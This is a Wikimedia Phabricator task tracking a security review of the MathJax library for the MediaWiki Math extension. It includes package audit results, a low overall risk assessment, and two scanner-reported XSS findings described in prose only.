Page MenuHomePhabricator
Create Task
Maniphest T354136

Application Security Review Request: MathJax
Closed, ResolvedPublic
Actions

Description

Project Information 

───────────────────────────────────────────────────────────────────────────────
Language                 Files     Lines   Blanks  Comments     Code Complexity
───────────────────────────────────────────────────────────────────────────────
JavaScript                  69       267        0       192       75         98
JSON                        17      1839       13         0     1826          0
Markdown                     4       625      152         0      473          0
YAML                         2        19        0         0       19          0
License                      1       202       33         0      169          0
gitignore                    1         2        1         0        1          0
───────────────────────────────────────────────────────────────────────────────
Total                       94      2954      199       192     2563         98
───────────────────────────────────────────────────────────────────────────────
Estimated Cost to Develop (organic) $72,574
Estimated Schedule Effort (organic) 5.08 months
Estimated People Required (organic) 1.27
───────────────────────────────────────────────────────────────────────────────
Processed 23817658 bytes, 23.818 megabytes (SI)
───────────────────────────────────────────────────────────────────────────────

To use MathJax from the client, users need access to the MathJax JS source code.

Either this can be done by referring to existing CDNs, which seems not to be an option for Wikimedia.
Thus, WMF and self-hosted wikis would need to host their copies of MathJax and already used in the context of the WDQS. Also, we have been using MathJax on the server side via npm https://www.npmjs.com/package/mathoid-mathjax.

For more context, see T310211

Details

SubjectRepoBranchLines +/-
Add MathJax rendering optionmediawiki/extensions/Mathmaster+2 K -3
Customize query in gerrit

Related Objects
Search...

Event Timeline

Physikerwelt created this task.Dec 31 2023, 3:38 PM
Restricted Application added a subscriber: Aklapper. · View Herald TranscriptDec 31 2023, 3:38 PM
Physikerwelt renamed this task from Security review for MathJax to Application Security Review Request: MathJax.Dec 31 2023, 4:49 PM
Physikerwelt added projects: Application Security Reviews, Security, secscrum.
Physikerwelt updated the task description. (Show Details)
Physikerwelt updated the task description. (Show Details)
Physikerwelt updated the task description. (Show Details)
gerritbot added a comment.Jan 2 2024, 12:10 PM

Change 987131 had a related patch set uploaded (by Physikerwelt; author: Physikerwelt):

[mediawiki/extensions/Math@master] Add MathJax rendering option

https://gerrit.wikimedia.org/r/987131

gerritbot added a project: Patch-For-Review.Jan 2 2024, 12:10 PM
sbassett moved this task from Incoming to Upcoming Quarter Planning Queue on the secscrum board.Jan 8 2024, 5:19 PM
sbassett assigned this task to mmartorana.Jan 9 2024, 5:23 PM
sbassett moved this task from Upcoming Quarter Planning Queue to In Progress on the secscrum board.
Physikerwelt moved this task from Inbox to Blocked: needs help on the Math board.Feb 17 2024, 9:37 PM
Physikerwelt added a subscriber: Jdforrester-WMF.Mar 1 2024, 4:19 PM

@mmartorana do you need https://gerrit.wikimedia.org/r/c/987131 to do the security review? If not, I would abandon the change and start over with the method suggested by @Jdforrester-WMF which I was not aware of when I created the patch.

MSantos added a parent task: T338429: Prepare Mathoid for RESTbase sunsetting.Mar 12 2024, 10:52 AM
MSantos added a project: RESTBase Sunsetting.
MSantos moved this task from Unsorted to Radar on the RESTBase Sunsetting board.
mmartorana added a comment.Mar 12 2024, 4:21 PM
In T354136#9591095, @Physikerwelt wrote:

@mmartorana do you need https://gerrit.wikimedia.org/r/c/987131 to do the security review? If not, I would abandon the change and start over with the method suggested by @Jdforrester-WMF which I was not aware of when I created the patch.

@Physikerwelt - feel free to use the method suggested by @Jdforrester-WMF.

Physikerwelt added a comment.Mar 14 2024, 4:17 PM
In T354136#9624091, @mmartorana wrote:

@Physikerwelt - feel free to use the method suggested by @Jdforrester-WMF.

@mmartorana Thank you. That was easier than expected. Do you have an estimate of how long the review might take?

MSantos triaged this task as High priority.Mar 14 2024, 8:44 PM
MSantos added subscribers: sbassett, MSantos.

With the QA review completion T353000#9623043, this is the next priority in our side in order to be successful with RESTBase Sunsetting for Mathoid. @mmartorana and @sbassett please let us know what would be the required next steps.

mmartorana added a comment.EditedMar 18 2024, 4:19 PM

Hi @MSantos and @Physikerwelt - I'm in the process of conducting the review, and it will be completed by the end of March.

Please inform us if there's anything else you require.

Physikerwelt mentioned this in T182041: Display math generates div inside of paragraph (HTML5 violation).Mar 28 2024, 8:01 PM
mmartorana moved this task from In Progress to Our Part Is Done on the secscrum board.Mar 29 2024, 5:42 PM

Security Review Summary - T354136- 2024-03-29
Last tag reviewed: v3.2.2

Summary

Upon reviewing the vendor code, it appears generally satisfactory from a security perspective. While there are some findings from sast, they should not pose significant risks. Additionally, there are only a few vulnerabilities such as CVEs or advisories, related to older versions of this extension. Considering also the overall support for this project, I would assess the risk level as low.

Mathjax

General Security Information

Statistic/InfoValueRisk
Repositoryhttps://github.com/mathjax/MathJax none
Repositoryhttps://github.com/mathjax/MathJax-src none
Relevant tag/branchv3.2.2 none
Last commit reviewed (if relevant)ad8f5c21 none
Recent contributions to code (6 months) (pull request merge)61 low
Active developers with > 10 commits3 low
Current overall usage10k stars low
Current open security issues0 none
Methods for reporting security issuesNo security policies medium

Vulnerable Packages
Risk: none

npm audit returned no results. low risk
snyk returned no results. low risk
osv-detector returned no results. low risk
sast-scan returned no results. low risk

Outdated Packages
Risk: none
As reported via npm outdated:
(no explicit vulnerabilities reported, simply noting for completeness' sake.)

PackageCurrentWantedLatestDepended By
@babel/core7.17.127.24.37.24.3MathJax-src
@babel/preset-env7.17.127.24.37.24.3MathJax-src
babel-loader8.2.58.3.09.1.3MathJax-src
diff5.0.05.2.05.2.0MathJax-src
mhchemparser4.1.14.2.14.2.1MathJax-src
mj-context-menu0.6.10.6.10.9.1MathJax-src
rimraf3.0.23.0.25.0.5MathJax-src
speech-rule-engine4.0.64.0.74.1.0-beta.8MathJax-src
tape5.5.35.7.55.7.5MathJax-src
terser-webpack-plugin5.3.15.3.105.3.10MathJax-src
typescript4.6.44.9.55.4.3MathJax-src
webpack5.72.15.91.05.91.0MathJax-src
webpack-cli4.9.24.10.05.1.4MathJax-src

Scorecard score
5 / 10 low
(see raw output: P59004)

Static Analysis Findings
sast-scan returned no results.
semgrep with various rules: P59005
bearer with various rules: P59008
horusec returned these findings: P59010
snyk returned these two findings:

✗ [Medium] Cross-site Scripting (XSS) 
  Path: ts/components/latest.ts, line 247 
  Info: Unsanitized input from browser storage flows into a 'src' script element attribute, where it is used to dynamically construct the HTML page on client side. This may result in a DOM Based Cross-Site Scripting attack (DOMXSS).

✗ [Medium] Cross-site Scripting (XSS) 
  Path: ts/components/latest.ts, line 253 
  Info: Unsanitized input from browser storage flows into appendChild, where it is used to dynamically construct the HTML page on client side. This may result in a DOM Based Cross-Site Scripting attack (DOMXSS).

General Security Issues
gitleaks and whispers returned no results. low risk

Physikerwelt added a comment.Tue, Apr 2, 12:15 PM

Thank you @mmartorana . @Jdforrester-WMF would you mind looking into the linked patch again, or should I search for another reviewer?

Physikerwelt added a comment.Tue, Apr 2, 1:09 PM

@mmartorana can you share the raw output linked here with the MathJax team or link it from this ticket.

MSantos added a project: MW-1.42-release.Tue, Apr 2, 1:18 PM
mmartorana added a comment.Tue, Apr 2, 1:56 PM

@Physikerwelt - I have now made the pastes public.

Daniel_Mietchen subscribed.Tue, Apr 2, 9:16 PM
Physikerwelt closed subtask T360176: Replace -s with _s in i18n math mode strings as Resolved.Sun, Apr 7, 11:17 AM
Jdforrester-WMF moved this task from Blocker to Not a blocker on the MW-1.42-release board.Mon, Apr 8, 2:17 PM
sbassett closed this task as Resolved.Mon, Apr 8, 6:07 PM
Content licensed under Creative Commons Attribution-ShareAlike (CC BY-SA) 4.0 unless otherwise noted; code licensed under GNU General Public License (GPL) 2.0 or later and other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL